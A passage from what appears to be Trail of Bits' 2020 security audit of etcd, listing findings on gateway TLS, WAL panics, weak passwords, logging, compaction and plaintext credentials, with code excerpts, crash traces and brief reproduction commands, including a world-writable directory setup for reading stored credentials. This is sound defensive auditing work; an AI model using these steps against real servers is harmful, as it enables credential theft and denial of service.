\n \n \nsrvs \n​\n:=\n​\n \n​\ndiscoverEndpoints\n​\n(lg, gatewayDNSCluster, gatewayCA, gatewayInsecureDiscovery,\n \ngatewayDNSClusterServiceName)\n \nif\n​\n \n​\nlen\n​\n(srvs.Endpoints) == \n​\n0\n​\n {\n \n// no endpoints discovered, fall back to provided endpoints\n \nsrvs.Endpoints = gatewayEndpoints\n \n}\n \nFigure TOB-ETCD-004.1: A snippet of the ​\nstartGateway\n​\n function definition\n \n(​\netcdmain/gateway.go#L102-L106\n​\n).\n \n \nExploit Scenario\n \nThe etcd gateway is configured with HTTPS-formatted endpoints. However, no\n \nauthentication of these endpoints is performed using the certificate provided by the\n \ncertificate authority; thus, TLS is not properly enforced.\n \n \nRecommendation\n \nShort term, ensure TLS authentication is applied to endpoints provided in the ​\n--endpoints\n \nflag on the etcd gateway. This will ensure consistent functionality across both endpoint\n \ndiscovery methods.\n \n \nLong term, ensure TLS connections are always used for gateway endpoints where the\n \nprotocol schema is HTTPS. This will force a fast failure for an endpoint that cannot\n \nsuccessfully authenticate with the gateway, and ensure the client only connects to an\n \nauthenticated backend.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 20\n \n 5 . T O C T O U o f g a t e w a y e n d p o i n t a u t h e n t i c a t i o n\n \nSeverity: Low\nDifficulty: Low\n \nType: Authentication\nFinding ID: TOB-ETCD-005\n \nTarget: ​\netcdmain/gateway.go\n \n \nDescription\n \nThe gateway only authenticates endpoints detected from DNS SRV records as documented\n \nin ​\nTOB-ETCD-004: Gateway TLS authentication only applies to endpoints detected in DNS\n \nSRV records​\n, and it only authenticates the detected endpoints once. Therefore, if an\n \nendpoint changes its authentication settings, the gateway will continue to assume the\n \nendpoint is still authenticated.\n \n \nExploit Scenario\n \nAn attacker compromises an etcd gateway endpoint and subsequently modifies the\n \nauthentication settings. Because the gateway does not enforce authentication upon each\n \nattempted connection, a misconfigured client may connect to the unauthenticated\n \nendpoint and request attacker-controlled values.\n \n \nRecommendation\n \nShort term, authenticate each endpoint using the provided CA certificate upon each\n \nconnection established by the etcd gateway. This will help prevent any endpoint that’s only\n \nbeen authenticated once from being trusted.\n \n \nLong term, consider implementing periodic endpoint validation to ensure all specified\n \nendpoints are not only reachable, but also authenticated. This will allow proactive detection\n \nof unhealthy endpoints, as well as those no longer able to successfully authenticate with\n \nthe given configuration.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 21\n \n 6 . A n e n t r y w i t h l a r g e i n d e x c a u s e s p a n i c i n W A L . R e a d A l l m e t h o d\n \nSeverity: Medium\nDifficulty: High\n \nType: Data Validation\nFinding ID: TOB-ETCD-006\n \nTarget: ​\nwal/wal.go\n \n \nDescription\n \nAfter a record’s data is successfully unmarshalled, it is possible to have an entry index,\n \ne.index\n​\n, greater then the number of entries in ​\nents\n​\n. Furthermore, ​\ne.index\n​\n could be\n \nmath.MaxInt64\n​\n while ​\nw.start.index\n​\n could be ​\n0\n​\n. This could cause issues when WAL entries\n \nare being read during consensus as an arbitrary etcd consensus participant could go down\n \nfrom a runtime panic when reading the entry.\n \n \nfunc\n​\n \n​\n(\n​\nw\n​\n *\n​\nWAL\n​\n) ReadAll\n​\n() (\n​\nmetadata\n​\n []\n​\nbyte\n​\n, \n​\nstate\n​\n \n​\nraftpb\n​\n.\n​\nHardState\n​\n, \n​\nents\n​\n []\n​\nraftpb\n​\n.\n​\nEntry\n​\n, \n​\nerr\n \nerror\n​\n) {\n \nw.mu.\n​\nLock\n​\n()\n \ndefer\n​\n w.mu.\n​\nUnlock\n​\n()\n \n \nrec \n​\n:=\n​\n &walpb.Record{}\n \ndecoder \n​\n:=\n​\n w.decoder\n \n \nvar\n​\n match \n​\nbool\n \nfor\n​\n err = decoder.\n​\ndecode\n​\n(rec); err == \n​\nnil\n​\n; err = decoder.\n​\ndecode\n​\n(rec) {\n \nswitch\n​\n rec.Type {\n \ncase\n​\n entryType:\n \ne \n​\n:=\n​\n \n​\nmustUnmarshalEntry\n​\n(rec.Data)\n \nif\n​\n e.Index > w.start.Index {\n \nents = \n​\nappend\n​\n(ents[:e.Index-w.start.Index-\n​\n1\n​\n], e)\n \n}\n \nw.enti = e.Index\n \nFigure TOB-ETCD-006.1: A snippet of the ​\nReadAll\n​\n function in the ​\nentryType\n​\n case, where the\n \nents\n​\n slice is indexed with a large integer, leading to a panic (​\nwal/wal.go#L423-L438\n​\n).\n \n \nA WAL entry that caused the following runtime panic was produced. Notice how the\n \ne.index\n​\n and ​\nw.start.Index\n​\n satisfy the “greater than” check. However, when\n \n13038096702221461993 - 0 - 1\n​\n evaluates to an upper bound of ​\n13038096702221461992,\n \nthe slice fails on the premise of being too large.\n \n \n2020-01-28 16:55:53.987278 I | wal: test10\n \n2020-01-28 16:55:54.032191 I | wal: e.Index: 13038096702221461993\n \n2020-01-28 16:55:54.032248 I | wal: w.start.Index: 0\n \npanic: runtime error: slice bounds out of range [:13038096702221461992] with capacity 0\n \ngoroutine 1 [running]:\n \ngo.etcd.io/etcd/wal.(*WAL).ReadAll(0xc0000de2a0, 0xc0000ae688, 0x4, 0x8, 0x0, 0x0, 0x0, 0x0,\n \n0x0, 0x0, ...)\n \n/.../go.etcd.io/etcd/wal/wal.go:439 +0x1121\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 22\n \n go.etcd.io/etcd/wal.FuzzRecover()\n \n/.../go.etcd.i/etcd/wal/wal_fuzzer.go:592 +0x77e\n \ngo.etcd.io/etcd/wal.FuzzStep()\n \n/.../go.etcd.io/etcd/wal/wal_fuzzer.go:1067 +0x48d\n \ngo.etcd.io/etcd/wal.FuzzWal()\n \n/.../go.etcd.io/etcd/wal/wal_fuzzer.go:1090 +0x8b\n \nmain.main()\n \n/.../go.etcd.io/etcd/fuzz.go:10 +0x20\n \nFigure TOB-ETCD-006.2: Trace of the triggered panic.\n \n \nExploit Scenario\n \nA RAFT participant receives a corrupted WAL from a compromised leader after an election.\n \nThe participant subsequently ​\npanic\n​\ns when the metadata is being parsed, which causes the\n \nparticipant to crash. A participant could also ​\npanic\n​\n on reading RAFT state from a WAL with\n \nthis error.\n \n \nRecommendation\n \nShort term, ensure proper size checks on the final ​\ne.Index-w.start.Index-1\n​\n in each WAL\n \nentry, and gracefully error if the size is too large for the given slice. This will prevent a hard\n \ncrash if an invalid WAL entry is encountered.\n \n \nLong term, restructure WALs to be limited by entry index ​\nand​\n size instead of size alone. This\n \nwill help prevent mutated entries from inducing a panic when parsing the WAL.\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 23\n \n 7 . A l a r g e s l i c e c a u s e s p a n i c i n d e c o d e R e c o r d m e t h o d\n \nSeverity: Medium\nDifficulty: High\n \nType: Data Validation\nFinding ID: TOB-ETCD-007\n \nTarget: ​\nwal/decoder.go\n \n \nDescription\n \nThe size of a record is stored in the length field of a WAL file, and no additional validation is\n \ndone on this data. Therefore, it is possible to forge an extremely large frame size—so large,\n \nin fact, that the ​\ndata := make([]byte, recBytes+padBytes)\n​\n can unintentionally panic at\n \nthe expense of any RAFT participant trying to decode the WAL.\n \n \nfunc\n​\n \n​\n(\n​\nd\n​\n *\n​\ndecoder\n​\n) decodeRecord\n​\n(\n​\nrec\n​\n *\n​\nwalpb\n​\n.\n​\nRecord\n​\n) \n​\nerror\n​\n {\n \nif\n​\n \n​\nlen\n​\n(d.brs) == \n​\n0\n​\n {\n \nreturn\n​\n io.EOF\n \n}\n \n \nl, err \n​\n:=\n​\n \n​\nreadInt64\n​\n(d.brs[\n​\n0\n​\n])\n \nif\n​\n err == io.EOF || (err == \n​\nnil\n​\n && l == \n​\n0\n​\n) {\n \n// hit end of file or preallocated space\n \nd.brs = d.brs[\n​\n1\n​\n:]\n \nif\n​\n \n​\nlen\n​\n(d.brs) == \n​\n0\n​\n {\n \nreturn\n​\n io.EOF\n \n}\n \nd.lastValidOff = \n​\n0\n \nreturn\n​\n d.\n​\ndecodeRecord\n​\n(rec)\n \n}\n \nif\n​\n err != \n​\nnil\n​\n {\n \nreturn\n​\n err\n \n}\n \n \nrecBytes, padBytes \n​\n:=\n​\n \n​\ndecodeFrameSize\n​\n(l)\n \n \ndata \n​\n:=\n​\n \n​\nmake\n​\n([]\n​\nbyte\n​\n, recBytes+padBytes)\n \nFigure TOB-ETCD-007.1: A snippet of the ​\ndecodeRecord\n​\n ​\nmethod with vulnerable ​\nmake\n​\n call\n \n \n(​\nwal/decoder.go#L62-L83\n​\n).\n \n \nA WAL file that was generated during fuzzing produced the following panic. Notice the\n \nruntime error that was caused by attempting to create a ​\n[]byt\n​\ne slice the size of ​\nrecBytes\n \n+ padBytes\n​\n after decoding the frame size from the length data.\n \n \npanic: runtime error: makeslice: len out of range\n \n \ngoroutine 1 [running]:\n \n \ngo.etcd.io/etcd/wal.(*decoder).decodeRecord(0xc00006a040, 0xc000103d18,\n \n0xc000103c30, 0x41a2a7)\n \n/.../go.etcd.io/etcd/wal/decoder.go:83 +0x21e\n \n \ngo.etcd.io/etcd/wal.(*decoder).decode(0xc00006a040, 0xc000103d18, 0x0, 0x0)\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 24\n \n /.../go.etcd.io/etcd/wal/decoder.go:59 +0xa7\n \n \ngo.etcd.io/etcd/wal.(*WAL).ReadAll(0xc000154000, 0x0, 0x0, 0x0, 0x0, 0x0,\n \n0x0, 0x0, 0x0, 0x0, ...)\n \n/.../go.etcd.io/etcd/wal/wal.go:431 +0x14b\n \n \ngo.etcd.io/etcd/wal.CovFuzz(0x0, 0x0, 0x0, 0x1)\n \n/.../go.etcd.io/etcd/wal/wal_covfuzzer.go:31 +0x171\n \nmain.main()\n \n /.../go.etcd.io/etcd/fuzz.go:31 +0xd6\n \nProcess finished with exit code 2\n \nFigure TOB-ETCD-007.2: Trace of the panic being triggered.\n \n \n \nExploit Scenario\n \nThe exact same exploit scenario from ​\nTOB-ETCD-006​\n can be applied to this vulnerability.\n \nHowever, in this case, any method trying to decode WAL data is vulnerable to this ​\npanic\n​\n.\n \nThe issue could arise from a malicious leader forging the size in their own WAL record.\n \n \nRecommendation\n \nShort term, provide a size check on the ​\ndecodeRecord\n​\n method and gracefully exit if the\n \nframe size is larger than the maximum slice length. This will prevent crashing due to\n \nout-of-bounds indexing of the allocated array if the WAL entry has been mutated.\n \n \nLong term, consider building a method to identify expected ranges for valid values into the\n \nformat for the WAL. This will assist additional validations of the WAL file, allowing the\n \ndetection of corruption or manipulation.\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 25\n \n 8 . N o m i n i m u m p a s s w o r d l e n g t h\n \nSeverity: Medium\nDifficulty: Low\n \nType: Access Control\nFinding ID: TOB-ETCD-008\n \nTarget: ​\nauth/store.go\n​\n, ​\nUserAdd\n​\n function\n \n \nDescription\n \netcd does not perform any password length validation, which allows for very short\n \npasswords, such as those with a length of one. This may allow an attacker to guess or\n \nbrute-force users’ passwords with little computational effort.\n \n \nExploit Scenario\n \nAlice sets her etcd user password to four characters. Eve, who can connect to the etcd\n \ncluster, brute-forces Alice’s password and successfully authenticates.\n \n \nRecommendation\n \nShort term, consider improving the password requirements to a higher minimum character\n \namount. This will make it harder for an attacker to brute-force authentication of an etcd\n \nuser.\n \n \nLong term, consider adopting a specific standard for password requirements, such as NIST\n \nSP 800-204, and enforce it across the codebase.\n \n \n \nReferences\n \n●\nNIST SP 800-204\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 26\n \n 9 . I n a c c u r a t e l o g g i n g o f a u t h e n t i c a t i o n a t t e m p t s f o r u s e r s w i t h C N - b a s e d\n \na u t h o n l y\n \nSeverity: Low\nDifficulty: Undetermined\n \nType: Logging\nFinding ID: TOB-ETCD-009\n \nTarget: ​\netcdserver/v3_server.go\n \n \nDescription\n \netcd users who have no password can authenticate only through a client certificate. When\n \nsuch users try to authenticate into etcd using the ​\nAuthenticate\n​\n endpoint (Figure\n \nTOB-ETCD-009.2), the errors in Figure TOB-ETCD-009.1 are logged.\n \n \n2020-02-01 17:35:04.368034 E | etcdserver: invalid authentication request to user root was\n \nissued\n \n2020-02-01 17:38:09.967097 N | auth: authentication failed, invalid password for user root\n \nFigure TOB-ETCD-009.1: Errors logged when trying to authenticate as a user with no password.\n \n \nThese logs provide insufficient information regarding why the authentication failed, and\n \nmay be misleading when auditing etcd logs.\n \n \nfunc\n​\n \n​\n(\n​\ns\n​\n *\n​\nEtcdServer\n​\n) Authenticate\n​\n(\n​\nctx\n​\n \n​\ncontext\n​\n.\n​\nContext\n​\n, \n​\nr\n​\n *\n​\npb\n​\n.\n​\nAuthenticateRequest\n​\n)\n \n(*\n​\npb\n​\n.\n​\nAuthenticateResponse\n​\n, \n​\nerror\n​\n) {\n \n \n​\n// (...)\n \n checkedRevision, err \n​\n:=\n​\n s.\n​\nAuthStore\n​\n().\n​\nCheckPassword\n​\n(r.Name, r.Password)\n \n \n​\nif\n​\n err != \n​\nnil\n​\n {\n \n \n​\nif\n​\n err != auth.ErrAuthNotEnabled {\n \n \n​\nif\n​\n lg != \n​\nnil\n​\n {\n \n lg.\n​\nWarn\n​\n(\n \n \n​\n\"invalid authentication was requested\"\n​\n,\n \n zap.\n​\nString\n​\n(\n​\n\"user\"\n​\n, r.Name),\n \n zap.\n​\nError\n​\n(err),\n \n )\n \n } \n​\nelse\n​\n {\n \n plog.\n​\nErrorf\n​\n(\n​\n\"invalid authentication request to user \n​\n%s\n​\n was issued\"\n​\n, r.Name)\n \n }\n \nFigure TOB-ETCD-009.2: The ​\nAuthenticate\n​\n endpoint function\n \n(​\netcdserver/v3_server.go#L410-L421\n​\n).\n \n \nA user with no password can be created with the ​\netcdctl user add <user>\n \n--no-password\n​\n command and the authentication request can be performed with the\n \ncommand in Figure TOB-ETCD-009.3.\n \n \ncurl -X POST http://127.0.0.1:2379/v3/auth/authenticate --data '{\"name\":\n \n\"<username>\", \"password\": \"\"}'\n \nFigure TOB-ETCD-009.3: a ​\ncurl\n​\n command of authentication without a password.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 27\n \n Note that this requires authentication to be enabled, which can be done with the ​\netcdctl\n \nauth enable\n​\n command.\n \n \nRecommendation\n \nShort term, ensure an appropriate error is logged when an authentication attempt has\n \nfailed due to a client certificate authentication. Ideally, each authentication method should\n \ngenerate unique log entries to allow operators to differentiate interactions.\n \n \nLong term, validate whether all significant program paths are logged distinguishably and\n \ndocumented appropriately. This will help ensure proper logging, and detections can be\n \nbuilt on each authentication method.\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 28\n \n 1 0 . T h e “ T o t a l n u m b e r o f d b k e y s c o m p a c t e d ” m e t r i c i s n e v e r c h a n g e d\n \nSeverity: Informational\nDifficulty: Undetermined\n \nType: Logging\nFinding ID: TOB-ETCD-010\n \nTarget: ​\nmvcc/kvstore_compaction.go, mvcc/metrics.go\n \n \nDescription\n \nThe ​\ndbCompactionKeysCounter\n​\n (Figure TOB-ETCD-010.1) never changes. This counter is\n \nsupposed to be increased by the ​\nkeyCompactions\n​\n value in the ​\nscheduleCompaction\n \nfunction (Figure TOB-ETCD-010.2) but the ​\nkeyCompactions\n​\n value never changes in that\n \nfunction. This can be misleading when debugging or auditing etcd.\n \n \ndbCompactionKeysCounter = prometheus.\n​\nNewCounter\n​\n(\n \n \n \nprometheus.CounterOpts{\n \n \n \nNamespace\n​\n: \n​\n\"etcd_debugging\"\n​\n,\n \n \n \nSubsystem\n​\n: \n​\n\"mvcc\"\n​\n,\n \n \n \nName\n​\n: \n​\n\"db_compaction_keys_total\"\n​\n,\n \n \n \nHelp\n​\n: \n​\n\"Total number of db keys compacted.\"\n​\n,\n \n \n \n})\n \nFigure TOB-ETCD-010.1: The ​\ndbCompactionKeysCounter\n​\n counter\n \n(​\nmvcc/metrics.go#L170-L176\n​\n).\n \n \nfunc\n​\n (\n​\ns\n​\n *\n​\nstore\n​\n) \n​\nscheduleCompaction\n​\n(compactMainRev int64, keep map[revision]struct{}) \n​\nbool\n​\n {\n \n totalStart \n​\n:=\n​\n time.\n​\nNow\n​\n()\n \n \n​\n// (...)\n \n keyCompactions \n​\n:=\n​\n \n​\n0\n \n \n​\ndefer\n​\n \n​\nfunc\n​\n() { dbCompactionKeysCounter.\n​\nAdd\n​\n(\n​\nfloat64\n​\n(keyCompactions)) }()\n \nFigure TOB-ETCD-010.2: The ​\nscheduleCompaction\n​\n function\n \n(​\nmvcc/kvstore_compaction.go#L27-L28\n​\n).\n \n \nRecommendation\n \nShort term, ensure the ​\ndbCompactionKeysCounter\n​\n variable properly represents the etcd\n \noperations that have occurred. This will help ensure the users can properly track and alert\n \non metrics.\n \n \nLong term, expand unit tests to include testing metrics endpoints to ensure changes to the\n \nmetrics endpoints still produce the expected behavior. This will prevent future introduction\n \nof breaking changes and ensure the stability of loggable metrics.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 29\n \n 1 1 . A u t o c o m p a c t i o n r e t e n t i o n c a n b e s e t t o n e g a t i v e v a l u e c a u s i n g a\n \nc o m p a c t i o n l o o p o r a c r a s h\n \nSeverity: Low\nDifficulty: Undetermined\n \nType: Data Validation\nFinding ID: TOB-ETCD-011\n \nTarget: Automatic history compaction\n \n \nDescription\n \nThe ​\nparseCompactionRetention\n​\n function (Figure TOB-ETCD-011.1) parses a ​\nretention\n \nstring with ​\nstrconv.Atoi\n​\n function and casts the result to ​\nint64\n​\n to create a ​\ntime.Duration\n \ninstance. This scheme allows the value to be negative and causes the node to execute the\n \nhistory compaction in a loop, taking more CPU than usual and spamming logs.\n \n \nfunc\n​\n \n​\nparseCompactionRetention\n​\n(\n​\nmode\n​\n, \n​\nretention\n​\n \n​\nstring\n​\n) (\n​\nret\n​\n \n​\ntime\n​\n.\n​\nDuration\n​\n, \n​\nerr\n​\n \n​\nerror\n​\n) {\n \n \n \nh, err \n​\n:=\n​\n strconv.\n​\nAtoi\n​\n(retention)\n \n \n \nif\n​\n err == \n​\nnil\n​\n {\n \n \n \nswitch\n​\n mode {\n \n \n \ncase\n​\n CompactorModeRevision:\n \n \n \nret = time.\n​\nDuration\n​\n(\n​\nint64\n​\n(h))\n \n \n \ncase\n​\n CompactorModePeriodic:\n \n \n \nret = time.\n​\nDuration\n​\n(\n​\nint64\n​\n(h)) * time.Hour\n \nFigure TOB-ETCD-011.1: The ​\nparseCompactionRetention\n​\n function\n \n(​\nembed/etcd.go#L812-L819\n​\n).\n \n \nSee the auto-compaction example in Figure TOB-ETCD-011.2.\n \n \n$ ./bin/etcd --auto-compaction-retention=-1\n \n \n# (...) - etcd initialisation logs\n \n \n2020-02-02 00:23:57.320788 N | compactor: Starting auto-compaction at revision 1 (retention:\n \n-1h0m0s)\n \n2020-02-02 00:23:57.329580 N | compactor: Finished auto-compaction at revision 1\n \n2020-02-02 00:23:57.329790 N | compactor: Starting auto-compaction at revision 1 (retention:\n \n-1h0m0s)\n \n2020-02-02 00:23:57.338759 N | compactor: Finished auto-compaction at revision 1\n \nFigure TOB-ETCD-011.2: Launching etcd with the ​\n--auto-compaction-retention=-1\n​\n flag\n \nmakes its compaction thread execute the auto-compaction all the time.\n \n \nAdditionally, on MacOS/Darwin when a zap logger is set and a negative auto compaction\n \nretention value is passed, the etcd crashes as shown in Figure TOB-ETCD-011.3.\n \n \n$ ./bin/etcd --auto-compaction-retention=-1 --logger=zap\n \n \n# (...) - etcd initialisation logs\n \n \n{\"level\":\"info\",\"ts\":\"2020-02-02T00:29:40.797+0100\",\"caller\":\"v3compactor/periodic.go:135\",\"\nmsg\":\"starting auto periodic compaction\",\"revision\":1,\"compact-period\":\"-1h0m0s\"}\n \npanic: runtime error: invalid memory address or nil pointer dereference\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 30\n \n [signal SIGSEGV: segmentation violation code=0x1 addr=0x20 pc=0x1825115]\n \n \ngoroutine 193 [running]:\n \n \ngo.etcd.io/etcd/etcdserver.(*EtcdServer).processInternalRaftRequestOnce(0xc0002bc580,\n \n0x1e70d00, 0xc0001622c0, 0xc00000c040, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...)\n \n/Users/dc/tob/projects/audit-etcd/src/etcd-3.4.3/etcdserver/v3_server.go:646 +0x1c5\n \n \ngo.etcd.io/etcd/etcdserver.(*EtcdServer).Compact(0xc0002bc580, 0x1e70d00, 0xc0001622c0,\n \n0xc0000ee070, 0x0, 0x0, 0x0)\n \n/Users/dc/tob/projects/audit-etcd/src/etcd-3.4.3/etcdserver/v3_server.go:208 +0xf1\n \n \ngo.etcd.io/etcd/etcdserver/api/v3compactor.(*Periodic).Run.func1(0xc00016e3f0, 0xb,\n \n0xffffffac2e53f000, 0xfffffcb9cf476000)\n \n/Users/dc/tob/projects/audit-etcd/src/etcd-3.4.3/etcdserver/api/v3compactor/periodic.go:143\n \n+0x53c\n \n \ncreated by go.etcd.io/etcd/etcdserver/api/v3compactor.(*Periodic).Run\n \n/Users/dc/tob/projects/audit-etcd/src/etcd-3.4.3/etcdserver/api/v3compactor/periodic.go:103\n \n+0xb0\n \nFigure TOB-ETCD-011.3: Launching etcd with the ​\n--auto-compaction-retention=-1\n \n--logger=zap\n​\n flags on MacOS makes it crash.\n \n \nExploitation Scenario\n \nAn attacker who can control the auto compaction retention setting sets it to -1 so it keeps\n \ncompacting etcd forever and saving it to logs, filling all disk space and rendering etcd\n \nunable to process properly.\n \n \nRecommendation\n \nShort term, do not accept a negative value of automatic compaction retention. Data\n \nvalidation should ensure the provided values are within the expected range.\n \n \nLong term, account for negative values provided as the auto compaction value. This should\n \nalso be tested within the corresponding ​\nTestAutoCompactionModeParse\n​\n test.\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 31\n \n 1 2 . U s e r c r e d e n t i a l s a r e s t o r e d i n W A L l o g s i n p l a i n t e x t\n \nSeverity: Low\nDifficulty: High\n \nType: Data Exposure\nFinding ID: TOB-ETCD-012\n \nTarget: WAL\n \n \nDescription\n \nUser credentials (login and password) are stored in WAL entries on each user\n \nauthentication. By default, the WAL files have correct permissions, and are only read-write\n \nfor the user who launched etcd, but if the path to the WAL log file has been created by an\n \nattacker, they could potentially read files containing the sensitive information stored by\n \netcd. ​\nTOB-ETCD-003: Directories created via os.MkdirAll are not checked for permissions\n \nfurther details the semantics behind this problem.\n \n \nThere is also an issue for this bug in ​\netcd-io/etcd#10132​\n.\n \n \nExploitation Scenario\n \nAn attacker is able to create directories on a server where etcd hasn't been launched yet.\n \nThey also create directories in the path where etcd will store its data. The attacker can then:\n \n \n1.\nCreate a fake etcd directory and file structure, and set file permissions so the etcd\n \nserver will be able to write there:\n \nmkdir -p default.etcd/member/wal\n \ntouch default.etcd/member/wal/0000000000000000-0000000000000000.wal\n \nchmod -R 777 default.etcd\n \n2.\nWait until etcd server is launched for the first time, authorization is enabled, and\n \nsome requests are made.\n \n3.\nRead the ​\ndefault.etcd/member/wal/0000000000000000-0000000000000000.wal\n \nfile which contains credentials.\n \n \nThis scenario exploits the ​\nTOB-ETCD-003 issue​\n.\n \n \nRecommendation\n \nShort term, do not store credentials in the WAL. Instead, consider having a centralized\n \nlocation for credentials that can be hardened appropriately, limiting the attack surface for\n \nsensitive information.\n \n \nLong term, check if permissions of the files used by etcd are within an acceptable range. If\n \nthe permissions are too broad, etcd should exit with an error for further investigation.\n \n \n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 32\n \n  \n1 3 . N u l l p o i n t e r e x c e p t i o n w h e n c a l l i n g w a l . R e a d A l l a f t e r w a l . C r e a t e\n \nSeverity: Informational\nDifficulty: Undetermined\n \nType: Data Validation\nFinding ID: TOB-ETCD-013\n \nTarget: ​\nwal/wal.go\n \n \nDescription\n \nThe ​\nwal.Create\n​\n function creates a WAL object without setting a ​\ndecoder\n​\n field.\n \nSubsequently, when a ​\nReadAll\n​\n method is called on the resulting WAL object which uses the\n \ndecoder\n​\n field, a nil pointer dereference is triggered. Since the ​\nwal.Create\n​\n function’s\n \ndocstring suggests that a ​\nReadAll\n​\n operation can be used after creating the object, this\n \nbehavior is counter-intuitive and may introduce unexpected failures if such a flow is used in\n \nthe future. Both functions appear in Figure TOB-ETCD-013.1.\n \n \n// Create creates a WAL ready for appending records. The given metadata is\n \n// recorded at the head of each WAL file, and can be retrieved with ReadAll.\n \nfunc\n​\n \n​\nCreate\n​\n(\n​\nlg\n​\n *\n​\nzap\n​\n.\n​\nLogger\n​\n, \n​\ndirpath\n​\n \n​\nstring\n​\n, \n​\nmetadata\n​\n []\n​\nbyte\n​\n) (*\n​\nWAL\n​\n, \n​\nerror\n​\n) { \n​\n/* (...) */ \n​\n}\n \n \nfunc\n​\n \n​\n(\n​\nw\n​\n *\n​\nWAL\n​\n) ReadAll\n​\n() (\n​\nmetadata\n​\n []\n​\nbyte\n​\n, \n​\nstate\n​\n \n​\nraftpb\n​\n.\n​\nHardState\n​\n, \n​\nents\n​\n []\n​\nraftpb\n​\n.\n​\nEntry\n​\n, \n​\nerr\n \nerror\n​\n) {\n \nw.mu.\n​\nLock\n​\n()\n \ndefer\n​\n w.mu.\n​\nUnlock\n​\n()\n \n \nrec \n​\n:=\n​\n &walpb.Record{}\n \ndecoder \n​\n:=\n​\n w.decoder\n \n \nvar\n​\n match \n​\nbool\n \nfor\n​\n err = \n​\ndecoder.\n​\ndecode\n​\n(rec); err == \n​\nnil\n​\n; err = decoder.\n​\ndecode\n​\n(rec) {\n \nFigure TOB-ETCD-013.1: The ​\nCreate\n​\n (​\nwal/wal.go#L95-L497\n​\n) and ​\nReadAll\n​\n functions\n \n(​\nwal/wal.go#L423-L431\n​\n).\n \n \nWhen the following issue occurs, a nil dereference triggers the panic. This issue was found\n \nduring the unit test fuzzing referenced in the ​\nAppendix C. Fuzzing results​\n.\n \n \npanic: runtime error: invalid memory address or nil pointer dereference\n \n[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x83f129]\n \n \ngoroutine 1 [running]:\n \nsync.(*Mutex).Lock(...)\n \n /usr/local/go/src/sync/mutex.go:74\n \ngo.etcd.io/etcd/wal.(*decoder).decode(0x0, 0xc0003b3d50, 0x0, 0x0)\n \n \n/home/sai/github/ToB/assurance/audits/go.etcd.io/etcd/wal/decoder.go:57\n \n+0x59\n \ngo.etcd.io/etcd/wal.(*WAL).ReadAll(0xc0000de2a0, 0x0, 0x0, 0x0, 0x0, 0x0,\n \n0x0, 0x0, 0x0, 0x0, ...)\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 33\n \n  \n/home/sai/github/ToB/assurance/audits/go.etcd.io/etcd/wal/wal.go:431 +0x151\n \ngo.etcd.io/etcd/wal.GenCorpus()\n \n \n/home/sai/github/ToB/assurance/audits/go.etcd.io/etcd/wal/wal_gen.go:62\n \n+0x3fe\n \nmain.main()\n \n /home/sai/github/ToB/assurance/audits/go.etcd.io/etcd/fuzz.go:20\n \n+0x20\n \n \nProcess finished with exit code 2\n \nFigure TOB-ETCD-013.2: Nil dereference panic traceback.\n \n \nExploitation Scenario\n \nA developer implements a new function or unit-test assuming the API supports the\n \nsubsequent creation and reading of records. This causes unexpected failures.\n \n \nRecommendation\n \nShort term, initialize a decoder in the ​\nwal.Create\n​\n function, so the ​\nWAL\n​\n may decode\n \ninformation in the ​\nwal.ReadAll\n​\n function. This will prevent users from encountering an\n \nerror due to an uninitialized decoder.\n \n \nLong term, check if the WAL has its decoder field set when it is going to be used, or refactor\n \nthe API to have a single function that creates a fully initialized WAL object.\n \n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 34\n \n 1 4 . S u b m i t t i n g a - 1 f o r c l u s t e r n o d e s i z e r e s u l t s i n a n i n d e x o u t - o f - b o u n d\n \np a n i c d u r i n g s e r v i c e d i s c o v e r y\n \nSeverity: Low\nDifficulty: Undetermined\n \nType: Data Validation\nFinding ID: TOB-ETCD-014\n \nTarget: Service discovery\n \n \nDescription\n \nWhen an etcd instance attempts to perform service discovery, if a cluster size of -1 is\n \nprovided, the etcd instance will panic without recovery.\n \n \nThis ​\npanic\n​\n occurs because the etcd instance retrieves a value from a remote key-value\n \nstore (e.g. an existing etcd instance or cluster) where the value is stored as a string. To\n \nconvert the string to an integer, ​\nstrconv.Atoi\n​\n is used (Figure TOB-ETCD-014.1), which\n \nreturns an ​\nint\n​\n. Because an ​\nint\n​\n can be negative, a lack of validation results in this value\n \nindexing a slice. This in turn creates an index out-of-bounds panic (Figure TOB-ETCD-014.2)\n \nuntil other etcd instances are discoverable (Figure TOB-ETCD-014.3).\n \n \nsize, err \n​\n:=\n​\n strconv.\n​\nAtoi\n​\n(resp.Node.Value)\n \nif\n​\n err != \n​\nnil\n​\n {\n \nreturn\n​\n \n​\nnil\n​\n, \n​\n0\n​\n, \n​\n0\n​\n, \n​\nErrBadSizeKey\n \n}\n \nFigure TOB-ETCD-014.1: The use of ​\nstrconv.Atoi\n​\n without validating the parsed integer beyond\n \nwhether an error occurred during conversion\n \n(​\netcdserver/api/v2discovery/discovery.go#L250-L253\n​\n).\n \n \npanic: runtime error: slice bounds out of range [:-1]\n \ngoroutine 1 [running]:\n \ngo.etcd.io/etcd/etcdserver/api/v2discovery.(*discovery).waitNodes(0xc000294\n6e0, 0xc000010210, 0x1, 0x1, 0xffffffffffffffff, 0xb, 0x0, 0x0, 0x0, 0x0,\n \n...)\n 